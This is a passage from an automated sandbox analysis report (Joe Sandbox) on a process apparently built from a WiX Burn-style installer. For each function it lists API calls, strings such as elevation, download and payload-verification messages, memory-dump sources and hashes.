GetCurrentProcessId.KERNEL32(?,00000000,?,?,008EB500), ref: 008B50D3
GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 008B5171
CloseHandle.KERNEL32(00000000), ref: 008B518A

Strings

-q -%ls %ls %ls %u, xrefs: 008B50F8
Failed to launch elevated child process: %ls, xrefs: 008B515E
burn.elevated, xrefs: 008B50F3
Failed to allocate parameters for elevated process., xrefs: 008B510C
open, xrefs: 008B513B, 008B5149
runas, xrefs: 008B5131

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Process$CloseCurrentHandle
String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
API String ID: 2815245435-1352204306
Opcode ID: e3c9104c8aaadbeb2e3a70244ef95f08749a9b6ae298cc7159c9cd14e99f141c
Instruction ID: 24240bbde5e75ffacfdcf2664588e68c401b72a1841768a520e054c06f8a1173
Opcode Fuzzy Hash: e3c9104c8aaadbeb2e3a70244ef95f08749a9b6ae298cc7159c9cd14e99f141c
Instruction Fuzzy Hash: D021667190160DFFCF129FA8CC85AAEBBB8FF08354B10816AFA11E2311D7359E509B91

Function 008A6882 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 008A68AC
GetProcAddress.KERNEL32(00000000), ref: 008A68B3
GetLastError.KERNEL32 ref: 008A68BD

Strings

Failed to get msi.dll version info., xrefs: 008A6905
msi, xrefs: 008A68A3
variable.cpp, xrefs: 008A68E1
Failed to set variant value., xrefs: 008A6929
Failed to find DllGetVersion entry point in msi.dll., xrefs: 008A68EB
DllGetVersion, xrefs: 008A689E

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
API String ID: 4275029093-842451892
Opcode ID: f44813d0ee0afac769f33eb9b0e1e99b7ed1bf26f9b85580f312d48145f3948c
Instruction ID: 91570d2e15cf0f2a0ae1942a64acac716c41d5e5c71e70dca32d18812593d2fe
Opcode Fuzzy Hash: f44813d0ee0afac769f33eb9b0e1e99b7ed1bf26f9b85580f312d48145f3948c
Instruction Fuzzy Hash: A311BB72E40779B6E720AB7D8C42A7FBBA8FB05710F050529BD11F6241E6789C1486E1

Function 008AD6C9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,008A47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,008A548E,?), ref: 008AD6DA
GetLastError.KERNEL32(?,008A47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,008A548E,?,?), ref: 008AD6E7
GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 008AD71F
GetLastError.KERNEL32(?,008A47FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,008A548E,?,?), ref: 008AD72B

Strings

Failed to load UX DLL., xrefs: 008AD712
BootstrapperApplicationCreate, xrefs: 008AD719
Failed to create UX., xrefs: 008AD76F
Failed to get BootstrapperApplicationCreate entry-point, xrefs: 008AD756
userexperience.cpp, xrefs: 008AD708, 008AD74C

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
API String ID: 1866314245-2276003667
Opcode ID: 22496dfa3186ca4eb5baa1184940969642a4d32a3ef19a682d408ab747d154e5
Instruction ID: 71af7f15bbe243c68f75fd1950cb4f198bd5f2c5c455d6601bde711a212cc23d
Opcode Fuzzy Hash: 22496dfa3186ca4eb5baa1184940969642a4d32a3ef19a682d408ab747d154e5
Instruction Fuzzy Hash: 9F11E237A81B72A7EB2546994C05B1B6A94FB07B21F014525BF22FBA81DF24EC0086D0

Function 008A1175 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 53libraryloadermemoryCOMMON

Download Yara Rule

APIs

HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,008A111A,cabinet.dll,00000009,?,?,00000000), ref: 008A1186
GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,008A111A,cabinet.dll,00000009,?,?,00000000), ref: 008A1191
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008A119F
GetLastError.KERNEL32(?,?,?,?,?,008A111A,cabinet.dll,00000009,?,?,00000000), ref: 008A11BA
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008A11C2
GetLastError.KERNEL32(?,?,?,?,?,008A111A,cabinet.dll,00000009,?,?,00000000), ref: 008A11D7

Strings

kernel32, xrefs: 008A118C
SetDefaultDllDirectories, xrefs: 008A1199
SetDllDirectoryW, xrefs: 008A11BC

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AddressErrorLastProc$HandleHeapInformationModule
String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
API String ID: 3104334766-1824683568
Opcode ID: 916d5f0baba2b0ba12b95773bea0b696563eea88cd154da1e247f0c328fda894
Instruction ID: c5168f3451aafc2a3d825911f04e492a2e85d93021daa1781dcd26035d6c7229
Opcode Fuzzy Hash: 916d5f0baba2b0ba12b95773bea0b696563eea88cd154da1e247f0c328fda894
Instruction Fuzzy Hash: 0501B13130025ABBEB216BA79C89D6F7B5CFB427A1B004021FA25D6150EB70EA01CBB0

Function 008BF639 Relevance: 15.2, APIs: 2, Strings: 8, Instructions: 155COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 008BF64E
LeaveCriticalSection.KERNEL32(?), ref: 008BF7C9

Strings

UX requested unknown payload with id: %ls, xrefs: 008BF6A3
user is active, cannot change user state., xrefs: 008BF668
Failed to set download user., xrefs: 008BF751
Failed to set download URL., xrefs: 008BF728
UX denied while trying to set download URL on embedded payload: %ls, xrefs: 008BF6B9
UX requested unknown container with id: %ls, xrefs: 008BF6F3
UX did not provide container or payload id., xrefs: 008BF7B8
Failed to set download password., xrefs: 008BF777

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: user is active, cannot change user state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
API String ID: 3168844106-2615595102
Opcode ID: a3c5114b13474135f739d80002e4bc7bd32d536b4086fd426b8c74609e603094
Instruction ID: 9ca6dfd47f36c2a3d2239c6df5aa08c5ae005130d26937a35dbb526e2dece34a
Opcode Fuzzy Hash: a3c5114b13474135f739d80002e4bc7bd32d536b4086fd426b8c74609e603094
Instruction Fuzzy Hash: 8F412A72500656ABCB219F38CC45EAAB3A8FF01724B1441B5FA14E7352DF74EC40C796

Function 008E5A5E Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,00000410,000000FF,?,00000000,00000000), ref: 008E5A9B
GetLastError.KERNEL32 ref: 008E5AA9
VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 008E5AEA
GetLastError.KERNEL32 ref: 008E5AF7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 008E5C6A
CloseHandle.KERNEL32(?), ref: 008E5C79

Strings

dlutil.cpp, xrefs: 008E5ACD
GET, xrefs: 008E5B9E

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
String ID: GET$dlutil.cpp
API String ID: 2028584396-3303425918
Opcode ID: 3812cec3d1b788d5eecdb8c0e11dc8e531728a02f33c6d4fd2e53cd0e320dd66
Instruction ID: 75b5a4c0e36ba4490253d8e82e32a8f396597c8dca18187dc0dab4594cdc4603
Opcode Fuzzy Hash: 3812cec3d1b788d5eecdb8c0e11dc8e531728a02f33c6d4fd2e53cd0e320dd66
Instruction Fuzzy Hash: 9D615D72A0069AABDB11CFA6CC85BAE7BB8FF49768F110119FD14F7250E73099409B90

Function 008B0C50 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 008B1020: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,008B0C6F,?,00000000,?,00000000,00000000), ref: 008B104F

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 008B0DF3
GetLastError.KERNEL32 ref: 008B0E00

Strings

Failed to append payload cache action., xrefs: 008B0DAA
Failed to append rollback cache action., xrefs: 008B0CCF
Failed to append cache action., xrefs: 008B0D4A
plan.cpp, xrefs: 008B0E24
Failed to append package start action., xrefs: 008B0C95
Failed to create syncpoint event., xrefs: 008B0E2E

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CompareCreateErrorEventLastString
String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
API String ID: 801187047-2489563283
Opcode ID: e2de6c4762beeba8e49998d8dbec5119acfb98676def03b512edb07e6bba8976
Instruction ID: c70a723e01adb668bcf5063fdea33cc757ad3b256c3b1fea659ddac34a77f298
Opcode Fuzzy Hash: e2de6c4762beeba8e49998d8dbec5119acfb98676def03b512edb07e6bba8976
Instruction Fuzzy Hash: 7C617B75500609EFCB15DF68C8909AABBFAFF84310F21845AE909DB311EB31EA41DB50

Function 008E6EFF Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 159COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,7622DFD0,000000FF,type,000000FF,?,7622DFD0,7622DFD0,7622DFD0), ref: 008E6F55
SysFreeString.OLEAUT32(00000000), ref: 008E6FA0
SysFreeString.OLEAUT32(00000000), ref: 008E701C
SysFreeString.OLEAUT32(00000000), ref: 008E7068

Strings

url, xrefs: 008E6F68
type, xrefs: 008E6F47
`Dv, xrefs: 008E6FA0, 008E701C, 008E7068

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: String$Free$Compare
String ID: `Dv$type$url
API String ID: 1324494773-3411263640
Opcode ID: dfedaffac1e29c9b063c767b3217a924a91a6f106c5e95f945913fc852608c43
Instruction ID: 0c162b7b762203af5b64ac83172e1e5ad5dc8f4473518d951bd2f5dba18ede18
Opcode Fuzzy Hash: dfedaffac1e29c9b063c767b3217a924a91a6f106c5e95f945913fc852608c43
Instruction Fuzzy Hash: 02517D35905259FFCB25DFA5C884EAEBBB8FF05321F1042A9E511EB2A0DB319E10DB50

Function 008B05A2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 133registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,008EB500,00000000,?), ref: 008B06D3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,008EB500,00000000,?), ref: 008B06E2

Part of subcall function 008E0BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,008B061A,?,00000000,00020006), ref: 008E0C0E

Strings

Failed to update resume mode., xrefs: 008B06B7
Failed to write volatile reboot required registry key., xrefs: 008B061E
%ls.RebootRequired, xrefs: 008B05F0
Failed to open registration key., xrefs: 008B071A
Failed to delete registration key: %ls, xrefs: 008B0681
crypt32.dll, xrefs: 008B05AC

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Close$Create
String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.$crypt32.dll
API String ID: 359002179-3398658923
Opcode ID: 9e1f41ce74835fd94fd388582f12bd9da8f330b42dee0217b411521d7a96a502
Instruction ID: 823938cce48b56f91954242a30472681c921ad81fd73dc9a0509ad9a5eb6aaad
Opcode Fuzzy Hash: 9e1f41ce74835fd94fd388582f12bd9da8f330b42dee0217b411521d7a96a502
Instruction Fuzzy Hash: 7B419D31900709FBDF22AEA5CC06EAF7BB9FFA2314F100419F515E1261D7759A609E92

Function 008AF451 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 109stringCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 008AF48A

Part of subcall function 008A4115: CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,008BA0E8,00000000,00000000,?,00000000,008A53BD,00000000,?,?,008AD5B5,?), ref: 008A4123
Part of subcall function 008A4115: GetLastError.KERNEL32(?,008BA0E8,00000000,00000000,?,00000000,008A53BD,00000000,?,?,008AD5B5,?,00000000,00000000), ref: 008A4131

lstrlenA.KERNEL32(008EB500,00000000,00000094,00000000,00000094,?,?,008B04BF,swidtag,00000094,?,008EB518,008B04BF,00000000,?,00000000), ref: 008AF4DD

Part of subcall function 008E4DB3: CreateFileW.KERNEL32(008EB500,40000000,00000001,00000000,00000002,00000080,00000000,008B04BF,00000000,?,008AF4F4,?,00000080,008EB500,00000000), ref: 008E4DCB
Part of subcall function 008E4DB3: GetLastError.KERNEL32(?,008AF4F4,?,00000080,008EB500,00000000,?,008B04BF,?,00000094,?,?,?,?,?,00000000), ref: 008E4DD8

Strings

Failed to allocate regid folder path., xrefs: 008AF53C
Failed to format tag folder path., xrefs: 008AF543
Failed to allocate regid file path., xrefs: 008AF535
swidtag, xrefs: 008AF49D
Failed to create regid folder: %ls, xrefs: 008AF525
Failed to write tag xml to file: %ls, xrefs: 008AF51B

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$swidtag
API String ID: 904508749-1201533908
Opcode ID: 642c68152c7051d6bc69383465d90d78fe9bfdc0efa9853e910337aaf4e9a365
Instruction ID: cf00b50a0e3c8f75d5c0fa23ff19c629d0dbb02e198b6190e3962026d7950fd1
Opcode Fuzzy Hash: 642c68152c7051d6bc69383465d90d78fe9bfdc0efa9853e910337aaf4e9a365
Instruction Fuzzy Hash: 42319C32D0061AFBEF119EA8CC41BADBBB5FF06710F104165EA10FA662D7719E509B91

Function 008B53E2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 91synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,008A548E,00000000,00000000,?,00000000), ref: 008B548B
GetLastError.KERNEL32(?,?,?,008A4C61,?,?,00000000,?,?,?,?,?,?,008EB4A0,?,?), ref: 008B5496

Strings

Failed to post terminate message to child process., xrefs: 008B5476
Failed to write restart to message buffer., xrefs: 008B542E
pipe.cpp, xrefs: 008B54BA
Failed to post terminate message to child process cache thread., xrefs: 008B545A
Failed to wait for child process exit., xrefs: 008B54C4
Failed to write exit code to message buffer., xrefs: 008B5406

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
API String ID: 1211598281-2161881128
Opcode ID: 3400f1dde8449758d2d63b8ecb5491d346f45f0e571d74d9919a47a36d45844c
Instruction ID: 53a26cd3a4dcc12e799033a28328d5a0a568cb2eae831c932ce792de08e553b7
Opcode Fuzzy Hash: 3400f1dde8449758d2d63b8ecb5491d346f45f0e571d74d9919a47a36d45844c
Instruction Fuzzy Hash: 3121D772940A2AB7DF225AA4DC05FEE7B68FF01721F104262FA10F6390D734AD9096D9

Function 008B9098 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,008B9F04,00000003,000007D0,00000003,?,000007D0), ref: 008B90B2
GetLastError.KERNEL32(?,008B9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 008B90BF
CloseHandle.KERNEL32(00000000,?,008B9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 008B9187

Strings

Failed to verify hash of payload: %ls, xrefs: 008B9172
Failed to open payload at path: %ls, xrefs: 008B9103
Failed to verify signature of payload: %ls, xrefs: 008B912F
Failed to verify catalog signature of payload: %ls, xrefs: 008B914E
cache.cpp, xrefs: 008B90F6

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
API String ID: 2528220319-2757871984
Opcode ID: 6af19cd4f5dbdec87099ec2ca72428a5ecadb4af493cc082d588210d006d2602
Instruction ID: ca4525c543b5a767293f212549a230d246180afb8e5aac08d135de9448cc5234
Opcode Fuzzy Hash: 6af19cd4f5dbdec87099ec2ca72428a5ecadb4af493cc082d588210d006d2602
Instruction Fuzzy Hash: 7821D63254062BB7DB321A6C8C8DBEB7A18FF11760F114211FF54E53A193299C61FAE1

Function 008A6B1E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 008A6B69
GetLastError.KERNEL32 ref: 008A6B73
GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 008A6BB7
GetLastError.KERNEL32 ref: 008A6BC1

Strings

Failed to get windows directory., xrefs: 008A6BA1
variable.cpp, xrefs: 008A6B97, 008A6BE5
Failed to set variant value., xrefs: 008A6C0B
Failed to get volume path name., xrefs: 008A6BEF

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$DirectoryNamePathVolumeWindows
String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
API String ID: 124030351-4026719079
Opcode ID: 7ad84170f398914026626e3e4d08e0bba214d1f24d0929b9c87c9da924d25430
Instruction ID: 5228ca0bb243b2fca7abb8505cee360ecaadc83863f493d0b15195a0f1b0174b
Opcode Fuzzy Hash: 7ad84170f398914026626e3e4d08e0bba214d1f24d0929b9c87c9da924d25430
Instruction Fuzzy Hash: FB21D673E4123967E73096598D06F9B77ACFB02B30F110175BE14FB241E638AE418AE6

Function 008A9C6D Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 008A9C88
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,000002C0,?,008AA895,00000100,000002C0,000002C0,?,000002C0), ref: 008A9CA0
GetLastError.KERNEL32(?,008AA895,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 008A9CAB

Strings

search.cpp, xrefs: 008A9CDB
Failed get to file attributes. '%ls', xrefs: 008A9CE8
Failed to format variable string., xrefs: 008A9C93
File search: %ls, did not find path: %ls, xrefs: 008A9CFD
Failed to set variable., xrefs: 008A9D2B

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
API String ID: 1811509786-2053429945
Opcode ID: bc70fa457fdae3f718955e83e9e5428b50aa9d9b579ab116663735dfa59439b1
Instruction ID: ba04317c2ed8a146ff2483d4fd83a05b00d35ee64b3cb997b77221e76bd620da
Opcode Fuzzy Hash: bc70fa457fdae3f718955e83e9e5428b50aa9d9b579ab116663735dfa59439b1
Instruction Fuzzy Hash: 28219833908625BBFB2216998C42FAEB668FF13331F200221FE54FA590D3655D8096D2

Function 008BAD40 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,?), ref: 008BAD57
GetLastError.KERNEL32 ref: 008BAD61
CoInitializeEx.OLE32(00000000,00000000), ref: 008BADA0
CoUninitialize.OLE32(?,008BC721,?,?), ref: 008BADDD

Strings

elevation.cpp, xrefs: 008BAD85
Failed to initialize COM., xrefs: 008BADAC
Failed to set elevated cache pipe into thread local storage for logging., xrefs: 008BAD8F
Failed to pump messages in child process., xrefs: 008BADCB

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
